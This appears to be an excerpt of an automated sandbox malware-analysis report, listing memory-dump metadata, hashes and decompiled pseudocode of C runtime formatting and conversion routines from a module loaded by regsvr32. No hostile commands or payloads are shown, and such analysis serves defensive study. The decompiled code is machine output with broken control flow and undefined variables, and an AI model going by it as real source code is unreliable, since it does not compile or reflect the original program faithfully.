                                                                    0x7fef9d3cbe5
                                                                    0x7fef9d3cbf0
                                                                    0x7fef9d3cc11
                                                                    0x7fef9d3cc16
                                                                    0x7fef9d3cc1b
                                                                    0x7fef9d3cc36
                                                                    0x7fef9d3cc43
                                                                    0x7fef9d3cc4e
                                                                    0x7fef9d3cc69
                                                                    0x7fef9d3cc74
                                                                    0x7fef9d3cc80
                                                                    0x7fef9d3cc85
                                                                    0x7fef9d3cc8e
                                                                    0x7fef9d3cc9b
                                                                    0x7fef9d3cca5
                                                                    0x7fef9d3cca7
                                                                    0x7fef9d3ccb2
                                                                    0x7fef9d3ccb4
                                                                    0x7fef9d3ccbf
                                                                    0x7fef9d3ccc6
                                                                    0x7fef9d3ccd5
                                                                    0x7fef9d3ccd7
                                                                    0x7fef9d3ccde
                                                                    0x7fef9d3cce3
                                                                    0x7fef9d3cce6
                                                                    0x7fef9d3ccf8
                                                                    0x7fef9d3cd00
                                                                    0x7fef9d3cd02
                                                                    0x7fef9d3cd0d
                                                                    0x7fef9d3cd0f
                                                                    0x7fef9d3cd14
                                                                    0x7fef9d3cd1a
                                                                    0x7fef9d3cd23
                                                                    0x7fef9d3cd3e
                                                                    0x7fef9d3cd43
                                                                    0x7fef9d3cd53
                                                                    0x7fef9d3cd5f
                                                                    0x7fef9d3cd68
                                                                    0x7fef9d3cd74
                                                                    0x7fef9d3cd97

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: get_int64_arg$wctomb_s
                                                                    • String ID: ("Incorrect format specifier", 0)$-$9$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 2984758162-268265396
                                                                    • Opcode ID: cb04687210e10a40ff2e156ef9e98a018461938d26ba5bbfa7ecca48610614c7
                                                                    • Instruction ID: a9c1e15515d35d7cf033a694107a1be22a212de4b62ef600bdbf999f0f55ea8a
                                                                    • Opcode Fuzzy Hash: cb04687210e10a40ff2e156ef9e98a018461938d26ba5bbfa7ecca48610614c7
                                                                    • Instruction Fuzzy Hash: 7202ED7260DBC586E7B1CB25E8857AEB7E4F384795F200125EACD86AA8DB7DD540CF00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                    • String ID: "$(pwcs == NULL && sizeInWords == 0) || (pwcs != NULL && sizeInWords > 0)$P$_mbstowcs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$retsize <= sizeInWords
                                                                    • API String ID: 2192614184-660564692
                                                                    • Opcode ID: 195fbd3003f3c87b3f41f90d73ab024ba3d25bb3ae880b5a9c818d30aa2f9b48
                                                                    • Instruction ID: 92bf99913cb81df5d7f4b76c0ee557dab353d6c18ff2e6375d0d5446e39197ae
                                                                    • Opcode Fuzzy Hash: 195fbd3003f3c87b3f41f90d73ab024ba3d25bb3ae880b5a9c818d30aa2f9b48
                                                                    • Instruction Fuzzy Hash: 8DE10C31A0DBC685E7B09B14E8457AEA3E0F384754FA04626D6DD53AE8DF7ED484CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 57%
                                                                    			E000007FE7FEF9D355F0(void* __ecx, long long __rcx, long long __rdx, signed int* __r8, signed int* __r9, long long _a8, void* _a16, signed int* _a24, signed int* _a32) {
                                                                    				long long _v24;
                                                                    				long long _v32;
                                                                    				long long _v40;
                                                                    				long long _v48;
                                                                    				long long _v56;
                                                                    				void* _v64;
                                                                    				long long _v72;
                                                                    				void* _t88;
                                                                    				void* _t89;
                                                                    				void* _t107;
                                                                    				void* _t109;
                                                                    				signed int* _t158;
                                                                    				signed int* _t160;
                                                                    				long long _t175;
                                                                    				long long _t186;
                                                                    				signed int* _t187;
                                                                    				signed int* _t193;
                                                                    
                                                                    				_a32 = __r9;
                                                                    				_a24 = __r8;
                                                                    				_a16 = __rdx;
                                                                    				_a8 = __rcx;
                                                                    				_v72 = 0;
                                                                    				_t158 = _a24;
                                                                    				if ( *((intOrPtr*)(_t158 + 4)) == 0) goto 0xf9d35639;
                                                                    				_t89 = E000007FE7FEF9D2E680(_t88, _t158);
                                                                    				_v56 = _t158 + _a24[1];
                                                                    				goto 0xf9d35642;
                                                                    				_v56 = 0;
                                                                    				if (_v56 == 0) goto 0xf9d356aa;
                                                                    				_t160 = _a24;
                                                                    				if ( *((intOrPtr*)(_t160 + 4)) == 0) goto 0xf9d35673;
                                                                    				E000007FE7FEF9D2E680(_t89, _t160);
                                                                    				_v48 = _t160 + _a24[1];
                                                                    				goto 0xf9d3567c;
                                                                    				_v48 = 0;
                                                                    				if ( *((char*)(_v48 + 0x10)) == 0) goto 0xf9d356aa;
                                                                    				if (_a24[2] != 0) goto 0xf9d356b1;
                                                                    				if (( *_a24 & 0x80000000) != 0) goto 0xf9d356b1;
                                                                    				goto 0xf9d35966;
                                                                    				if (( *_a24 & 0x80000000) == 0) goto 0xf9d356d0;
                                                                    				_v64 = _a16;
                                                                    				goto 0xf9d356e9;
                                                                    				_v64 = _a24[2] +  *_a16;
                                                                    				if (( *_a24 & 0x00000008) == 0) goto 0xf9d35765;
                                                                    				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d3575b;
                                                                    				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d3575b;
                                                                    				 *_v64 =  *((intOrPtr*)(_a8 + 0x28));
                                                                    				_t175 = _v64;
                                                                    				E000007FE7FEF9D35B30(_t100,  *_t175,  &(_a32[2]));
                                                                    				 *_v64 = _t175;
                                                                    				goto 0xf9d35760;
                                                                    				E000007FE7FEF9D2CF80(_t175);
                                                                    				goto 0xf9d3595a;
                                                                    				if (( *_a32 & 0x00000001) == 0) goto 0xf9d35813;
                                                                    				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d35809;
                                                                    				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d35809;
                                                                    				_t107 = E000007FE7FEF9D2C410(__ecx, E000007FE7FEF9D3D2C0(1, _v64), _v64,  *((intOrPtr*)(_a8 + 0x28)), _a32[5]);
                                                                    				if (_a32[5] != 8) goto 0xf9d35807;
                                                                    				if ( *_v64 == 0) goto 0xf9d35807;
                                                                    				_t186 = _v64;
                                                                    				E000007FE7FEF9D35B30(_t107,  *_t186,  &(_a32[2]));
                                                                    				 *_v64 = _t186;
                                                                    				goto 0xf9d3580e;
                                                                    				_t109 = E000007FE7FEF9D2CF80(_t186);
                                                                    				goto 0xf9d3595a;
                                                                    				_t187 = _a32;
                                                                    				if ( *((intOrPtr*)(_t187 + 0x18)) == 0) goto 0xf9d3583c;
                                                                    				E000007FE7FEF9D2E6A0(_t109, _t187);
                                                                    				_v40 = _t187 + _a32[6];
                                                                    				goto 0xf9d35845;
                                                                    				_v40 = 0;
                                                                    				if (_v40 != 0) goto 0xf9d358c6;
                                                                    				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d358bc;
                                                                    				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d358bc;
                                                                    				_t191 = _a32[5];
                                                                    				_v32 = _a32[5];
                                                                    				E000007FE7FEF9D35B30(_t112,  *((intOrPtr*)(_a8 + 0x28)),  &(_a32[2]));
                                                                    				E000007FE7FEF9D2C410(__ecx, E000007FE7FEF9D3D2C0(1, _v64), _v64, _a32[5], _v32);
                                                                    				goto 0xf9d358c1;
                                                                    				E000007FE7FEF9D2CF80(_t191);
                                                                    				goto 0xf9d3595a;
                                                                    				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d35955;
                                                                    				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d35955;
                                                                    				_t193 = _a32;
                                                                    				if ( *((intOrPtr*)(_t193 + 0x18)) == 0) goto 0xf9d35919;
                                                                    				E000007FE7FEF9D2E6A0(_t117, _t193);
                                                                    				_v24 = _t193 + _a32[6];
                                                                    				goto 0xf9d35922;
                                                                    				_v24 = 0;
                                                                    				if (E000007FE7FEF9D3D2F0(_v24) == 0) goto 0xf9d35955;
                                                                    				_t195 = _a32;
                                                                    				if (( *_a32 & 0x00000004) == 0) goto 0xf9d3594b;
                                                                    				_v72 = 2;
                                                                    				goto 0xf9d35953;
                                                                    				_v72 = 1;
                                                                    				goto 0xf9d3595a;
                                                                    				E000007FE7FEF9D2CF80(_a32);
                                                                    				E000007FE7FEF9D2CF50(_t195);
                                                                    				return _v72;
                                                                    			}




















                                                                    0x7fef9d355f0
                                                                    0x7fef9d355f5
                                                                    0x7fef9d355fa
                                                                    0x7fef9d355ff
                                                                    0x7fef9d35608
                                                                    0x7fef9d35610
                                                                    0x7fef9d3561c
                                                                    0x7fef9d3561e
                                                                    0x7fef9d35632
                                                                    0x7fef9d35637
                                                                    0x7fef9d35639
                                                                    0x7fef9d35648
                                                                    0x7fef9d3564a
                                                                    0x7fef9d35656
                                                                    0x7fef9d35658
                                                                    0x7fef9d3566c
                                                                    0x7fef9d35671
                                                                    0x7fef9d35673
                                                                    0x7fef9d35687
                                                                    0x7fef9d35695
                                                                    0x7fef9d356a8
                                                                    0x7fef9d356ac
                                                                    0x7fef9d356c2
                                                                    0x7fef9d356c9
                                                                    0x7fef9d356ce
                                                                    0x7fef9d356e4
                                                                    0x7fef9d356f8
                                                                    0x7fef9d3570f
                                                                    0x7fef9d35722
                                                                    0x7fef9d35732
                                                                    0x7fef9d35744
                                                                    0x7fef9d3574c
                                                                    0x7fef9d35756
                                                                    0x7fef9d35759
                                                                    0x7fef9d3575b
                                                                    0x7fef9d35760
                                                                    0x7fef9d35774
                                                                    0x7fef9d3578f
                                                                    0x7fef9d357a2
                                                                    0x7fef9d357c1
                                                                    0x7fef9d357d6
                                                                    0x7fef9d357e1
                                                                    0x7fef9d357f2
                                                                    0x7fef9d357fa
                                                                    0x7fef9d35804
                                                                    0x7fef9d35807
                                                                    0x7fef9d35809
                                                                    0x7fef9d3580e
                                                                    0x7fef9d35813
                                                                    0x7fef9d3581f
                                                                    0x7fef9d35821
                                                                    0x7fef9d35835
                                                                    0x7fef9d3583a
                                                                    0x7fef9d3583c
                                                                    0x7fef9d3584b
                                                                    0x7fef9d35862
                                                                    0x7fef9d35875
                                                                    0x7fef9d3587f
                                                                    0x7fef9d35883
                                                                    0x7fef9d358a0
                                                                    0x7fef9d358b5
                                                                    0x7fef9d358ba
                                                                    0x7fef9d358bc
                                                                    0x7fef9d358c1
                                                                    0x7fef9d358db
                                                                    0x7fef9d358ee
                                                                    0x7fef9d358f0
                                                                    0x7fef9d358fc
                                                                    0x7fef9d358fe
                                                                    0x7fef9d35912
                                                                    0x7fef9d35917
                                                                    0x7fef9d35919
                                                                    0x7fef9d3592e
                                                                    0x7fef9d35930
                                                                    0x7fef9d3593f
                                                                    0x7fef9d35941
                                                                    0x7fef9d35949
                                                                    0x7fef9d3594b
                                                                    0x7fef9d35953
                                                                    0x7fef9d35955
                                                                    0x7fef9d3595c
                                                                    0x7fef9d3596a

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Validate$Read$Pointer_inconsistency$Adjust$DecodeExecuteterminate
                                                                    • String ID:
                                                                    • API String ID: 801082872-0
                                                                    • Opcode ID: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                                                    • Instruction ID: 9d611a2ef42a4ce54476322da2bce67ea854ec722e2e267300ecfa65af3b148c
                                                                    • Opcode Fuzzy Hash: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                                                    • Instruction Fuzzy Hash: 4DA13D32B0CA4682EAA08B16E89077E67E0F7C4B95F208121DACD877B5DF3ED451CB10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtow_s
                                                                    • API String ID: 2123368286-1993839260
                                                                    • Opcode ID: f8a5afe18f34840ee0df28905467ae8a93c47803c1f8068a44ba45b34dbb5592
                                                                    • Instruction ID: 19a34de06f4f25a15c822aae2b95ff87e4dec291f3645630fab9b4d6ba707880
                                                                    • Opcode Fuzzy Hash: f8a5afe18f34840ee0df28905467ae8a93c47803c1f8068a44ba45b34dbb5592
                                                                    • Instruction Fuzzy Hash: 4AE11836A1CB86CAE7A09B18E84476EB3E1F784345F604525E6CD83BB8DB7ED444CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtoa_s
                                                                    • API String ID: 2123368286-1853640030
                                                                    • Opcode ID: fd24ae2173ac44ea26de12f4013dd461b82e36f4d48be66e2593e9709099cfaf
                                                                    • Instruction ID: 612b8f3a1e511721bf558c20b5ecc37bcc5fe5373454d887446b2b671354ce2d
                                                                    • Opcode Fuzzy Hash: fd24ae2173ac44ea26de12f4013dd461b82e36f4d48be66e2593e9709099cfaf
                                                                    • Instruction Fuzzy Hash: 2EE13A32A1DB86CAE7A09B59E8447AEB7E1F385344F604125E6CD43BB8DB7ED444CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 22%
                                                                    			E000007FE7FEF9D3E6C6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
                                                                    				signed int _t224;
                                                                    				signed char _t229;
                                                                    				void* _t260;
                                                                    				intOrPtr _t268;
                                                                    				signed int _t342;
                                                                    				signed int _t343;
                                                                    				signed long long _t346;
                                                                    				intOrPtr* _t365;
                                                                    				intOrPtr* _t370;
                                                                    				signed long long _t400;
                                                                    
                                                                    				_t342 = __rax;
                                                                    				_a80 = _a80 | 0x00000040;
                                                                    				_a72 = 0xa;
                                                                    				_a72 = 0xa;
                                                                    				_a116 = 0x10;
                                                                    				asm("bts eax, 0xf");
                                                                    				_a1220 = 7;
                                                                    				_a1220 = 0x27;
                                                                    				_a72 = 0x10;
                                                                    				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e74d;
                                                                    				_a84 = 0x30;
                                                                    				_a86 = _a1220 + 0x51;
                                                                    				_a92 = 2;
                                                                    				_a72 = 8;
                                                                    				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e770;
                                                                    				asm("bts eax, 0x9");
                                                                    				if ((_a80 & 0x00008000) == 0) goto 0xf9d3e797;
                                                                    				E000007FE7FEF9D31EA0( &_a1560);
                                                                    				_a1304 = _t342;
                                                                    				goto 0xf9d3e844;
                                                                    				if ((_a80 & 0x00001000) == 0) goto 0xf9d3e7be;
                                                                    				E000007FE7FEF9D31EA0( &_a1560);
                                                                    				_a1304 = _t342;
                                                                    				goto 0xf9d3e844;
                                                                    				if ((_a80 & 0x00000020) == 0) goto 0xf9d3e809;
                                                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e7ef;
                                                                    				_t343 = E000007FE7FEF9D31E40( &_a1560);
                                                                    				_a1304 = _t343;
                                                                    				goto 0xf9d3e807;
                                                                    				E000007FE7FEF9D31E40( &_a1560);
                                                                    				_a1304 = _t343;
                                                                    				goto 0xf9d3e844;
                                                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e82d;
                                                                    				E000007FE7FEF9D31E40( &_a1560);
                                                                    				_a1304 = _t343;
                                                                    				goto 0xf9d3e844;
                                                                    				E000007FE7FEF9D31E40( &_a1560);
                                                                    				_a1304 = _t343;
                                                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e87b;
                                                                    				if (_a1304 >= 0) goto 0xf9d3e87b;
                                                                    				_a1312 =  ~_a1304;
                                                                    				asm("bts eax, 0x8");
                                                                    				goto 0xf9d3e88b;
                                                                    				_t346 = _a1304;
                                                                    				_a1312 = _t346;
                                                                    				if ((_a80 & 0x00008000) != 0) goto 0xf9d3e8c0;
                                                                    				if ((_a80 & 0x00001000) != 0) goto 0xf9d3e8c0;
                                                                    				_a1312 = _a1312 & _t346;
                                                                    				if (_a116 >= 0) goto 0xf9d3e8d1;
                                                                    				_a116 = 1;
                                                                    				goto 0xf9d3e8ee;
                                                                    				_a80 = _a80 & 0xfffffff7;
                                                                    				if (_a116 - 0x200 <= 0) goto 0xf9d3e8ee;
                                                                    				_a116 = 0x200;
                                                                    				if (_a1312 != 0) goto 0xf9d3e901;
                                                                    				_a92 = 0;
                                                                    				_a64 =  &_a687;
                                                                    				_t224 = _a116;
                                                                    				_a116 = _a116 - 1;
                                                                    				if (_t224 > 0) goto 0xf9d3e92f;
                                                                    				if (_a1312 == 0) goto 0xf9d3e9cc;
                                                                    				_a1480 = _a72;
                                                                    				_a1296 = _t224 / _a1480 + 0x30;
                                                                    				_a1488 = _a72;
                                                                    				if (_a1296 - 0x39 <= 0) goto 0xf9d3e9ab;
                                                                    				_t229 = _a1296 + _a1220;
                                                                    				_a1296 = _t229;
                                                                    				 *_a64 = _a1296 & 0x000000ff;
                                                                    				_a64 = _a64 - 1;
                                                                    				goto 0xf9d3e90e;
                                                                    				_a104 = _t229;
                                                                    				_a64 = _a64 + 1;
                                                                    				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ea2a;
                                                                    				if (_a104 == 0) goto 0xf9d3ea0b;
                                                                    				if ( *_a64 == 0x30) goto 0xf9d3ea2a;
                                                                    				_a64 = _a64 - 1;
                                                                    				 *_a64 = 0x30;
                                                                    				_a104 = _a104 + 1;
                                                                    				if (_a108 != 0) goto 0xf9d3ec7c;
                                                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ea9d;
                                                                    				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ea61;
                                                                    				_a84 = 0x2d;
                                                                    				_a92 = 1;
                                                                    				goto 0xf9d3ea9d;
                                                                    				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ea80;
                                                                    				_a84 = 0x2b;
                                                                    				_a92 = 1;
                                                                    				goto 0xf9d3ea9d;
                                                                    				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ea9d;
                                                                    				_a84 = 0x20;
                                                                    				_a92 = 1;
                                                                    				_a1320 = _a88 - _a104 - _a92;
                                                                    				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3eadf;
                                                                    				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                                    				E000007FE7FEF9D3EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
                                                                    				if ((_a80 & 0x00000008) == 0) goto 0xf9d3eb33;
                                                                    				if ((_a80 & 0x00000004) != 0) goto 0xf9d3eb33;
                                                                    				E000007FE7FEF9D3EEC0(0x30, _a1320, _a1536,  &_a1200);
                                                                    				if (_a76 != 0) goto 0xf9d3ec29;
                                                                    				if (_a104 <= 0) goto 0xf9d3ec29;
                                                                    				_t365 = _a64;
                                                                    				_a1328 = _t365;
                                                                    				_a1336 = _a104;
                                                                    				_a1336 = _a1336 - 1;
                                                                    				if (_a1336 <= 0) goto 0xf9d3ec27;
                                                                    				_t260 = E000007FE7FEF9D26840(_a1336,  &_a120);
                                                                    				_a1496 = _t365;
                                                                    				E000007FE7FEF9D26840(_t260,  &_a120);
                                                                    				_a1340 = E000007FE7FEF9D3F000( &_a1212, _a1328,  *((intOrPtr*)( *_t365 + 0x10c)), _a1496);
                                                                    				if (_a1340 > 0) goto 0xf9d3ebe7;
                                                                    				_a1200 = 0xffffffff;
                                                                    				goto 0xf9d3ec27;
                                                                    				E000007FE7FEF9D3EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
                                                                    				_a1328 = _a1328 + _a1340;
                                                                    				goto 0xf9d3eb61;
                                                                    				goto 0xf9d3ec47;
                                                                    				E000007FE7FEF9D3EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
                                                                    				if (_a1200 < 0) goto 0xf9d3ec7c;
                                                                    				if ((_a80 & 0x00000004) == 0) goto 0xf9d3ec7c;
                                                                    				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                                    				if (_a96 == 0) goto 0xf9d3ec9c;
                                                                    				0xf9d25330();
                                                                    				_a96 = 0;
                                                                    				goto 0xf9d3da75;
                                                                    				if (_a1216 == 0) goto 0xf9d3ecc2;
                                                                    				if (_a1216 == 7) goto 0xf9d3ecc2;
                                                                    				_a1504 = 0;
                                                                    				goto 0xf9d3eccd;
                                                                    				_a1504 = 1;
                                                                    				_t268 = _a1504;
                                                                    				_a1344 = _t268;
                                                                    				if (_a1344 != 0) goto 0xf9d3ed13;
                                                                    				_t370 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                                    				_a32 = _t370;
                                                                    				r9d = 0;
                                                                    				r8d = 0x8f5;
                                                                    				0xf9d2b3b0();
                                                                    				if (_t268 != 1) goto 0xf9d3ed13;
                                                                    				asm("int3");
                                                                    				if (_a1344 != 0) goto 0xf9d3ed6f;
                                                                    				0xf9d2ab30();
                                                                    				 *_t370 = 0x16;
                                                                    				_a32 = 0;
                                                                    				r9d = 0x8f5;
                                                                    				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                    				_a1376 = 0xffffffff;
                                                                    				E000007FE7FEF9D26800( &_a120);
                                                                    				goto 0xf9d3ed8e;
                                                                    				_a1380 = _a1200;
                                                                    				E000007FE7FEF9D26800( &_a120);
                                                                    				return E000007FE7FEF9D23280(_a1380, 2, 2, _a1512 ^ _t400, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                    			}













                                                                    0x7fef9d3e6c6
                                                                    0x7fef9d3e6cd
                                                                    0x7fef9d3e6d1
                                                                    0x7fef9d3e6de
                                                                    0x7fef9d3e6eb
                                                                    0x7fef9d3e6f7
                                                                    0x7fef9d3e6ff
                                                                    0x7fef9d3e70c
                                                                    0x7fef9d3e717
                                                                    0x7fef9d3e72a
                                                                    0x7fef9d3e731
                                                                    0x7fef9d3e740
                                                                    0x7fef9d3e745
                                                                    0x7fef9d3e74f
                                                                    0x7fef9d3e762
                                                                    0x7fef9d3e768
                                                                    0x7fef9d3e77b
                                                                    0x7fef9d3e785
                                                                    0x7fef9d3e78a
                                                                    0x7fef9d3e792
                                                                    0x7fef9d3e7a2
                                                                    0x7fef9d3e7ac
                                                                    0x7fef9d3e7b1
                                                                    0x7fef9d3e7b9
                                                                    0x7fef9d3e7c7
                                                                    0x7fef9d3e7d2
                                                                    0x7fef9d3e7e1
                                                                    0x7fef9d3e7e5
                                                                    0x7fef9d3e7ed
                                                                    0x7fef9d3e7f7
                                                                    0x7fef9d3e7ff
                                                                    0x7fef9d3e807
                                                                    0x7fef9d3e812
                                                                    0x7fef9d3e81c
                                                                    0x7fef9d3e823
                                                                    0x7fef9d3e82b
                                                                    0x7fef9d3e835
                                                                    0x7fef9d3e83c
                                                                    0x7fef9d3e84d
                                                                    0x7fef9d3e858
                                                                    0x7fef9d3e865
                                                                    0x7fef9d3e871
                                                                    0x7fef9d3e879
                                                                    0x7fef9d3e87b
                                                                    0x7fef9d3e883
                                                                    0x7fef9d3e896
                                                                    0x7fef9d3e8a3
                                                                    0x7fef9d3e8b8
                                                                    0x7fef9d3e8c5
                                                                    0x7fef9d3e8c7
                                                                    0x7fef9d3e8cf
                                                                    0x7fef9d3e8d8
                                                                    0x7fef9d3e8e4
                                                                    0x7fef9d3e8e6
                                                                    0x7fef9d3e8f7
                                                                    0x7fef9d3e8f9
                                                                    0x7fef9d3e909
                                                                    0x7fef9d3e90e
                                                                    0x7fef9d3e918
                                                                    0x7fef9d3e91e
                                                                    0x7fef9d3e929
                                                                    0x7fef9d3e934
                                                                    0x7fef9d3e957
                                                                    0x7fef9d3e963
                                                                    0x7fef9d3e990
                                                                    0x7fef9d3e9a2
                                                                    0x7fef9d3e9a4
                                                                    0x7fef9d3e9b8
                                                                    0x7fef9d3e9c2
                                                                    0x7fef9d3e9c7
                                                                    0x7fef9d3e9d9
                                                                    0x7fef9d3e9e5
                                                                    0x7fef9d3e9f5
                                                                    0x7fef9d3e9fc
                                                                    0x7fef9d3ea09
                                                                    0x7fef9d3ea13
                                                                    0x7fef9d3ea1d
                                                                    0x7fef9d3ea26
                                                                    0x7fef9d3ea2f
                                                                    0x7fef9d3ea3e
                                                                    0x7fef9d3ea4b
                                                                    0x7fef9d3ea52
                                                                    0x7fef9d3ea57
                                                                    0x7fef9d3ea5f
                                                                    0x7fef9d3ea6a
                                                                    0x7fef9d3ea71
                                                                    0x7fef9d3ea76
                                                                    0x7fef9d3ea7e
                                                                    0x7fef9d3ea89
                                                                    0x7fef9d3ea90
